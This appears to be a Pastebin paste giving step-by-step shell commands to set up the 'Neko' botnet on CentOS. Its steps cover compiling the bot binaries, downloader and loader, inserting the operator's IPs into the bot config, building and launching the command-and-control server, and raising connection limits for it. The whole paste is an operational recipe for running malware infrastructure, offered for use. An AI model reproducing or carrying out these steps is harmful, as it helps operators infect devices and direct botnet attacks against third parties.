Advertisement
Guest User

NEKO BOT CNC Setup

a guest
Sep 22nd, 2019
116
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.54 KB | None | 0 0
  1. Neko Bot Setup CentOS 6.9
  2.  
  3. Step one: yum install gcc screen perl python-paramiko build-essential -y
  4.  
  5. Step two: edit the IPs in bot/config.h ll/src/main.c dlr/main.c
  6.  
  7. Step three: cd bot then python cc.py
  8.  
  9. Step four: cd .. && cd dlr && sh build.sh && cd release && mv * /root/ll/bins
  10.  
  11. Step five: cd && cd ll && sh build.sh
  12.  
  13. Step six: cd && cd cnc && gcc sao.c -o cnc -pthread && nano sao.txt // create your login //
  14.  
  15. Step seven: ulimit -n 999999 //// unlimited connections to your server
  16.  
  17. And then last: screen ./cnc YOURBOTPORT 1 CNCPORT
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement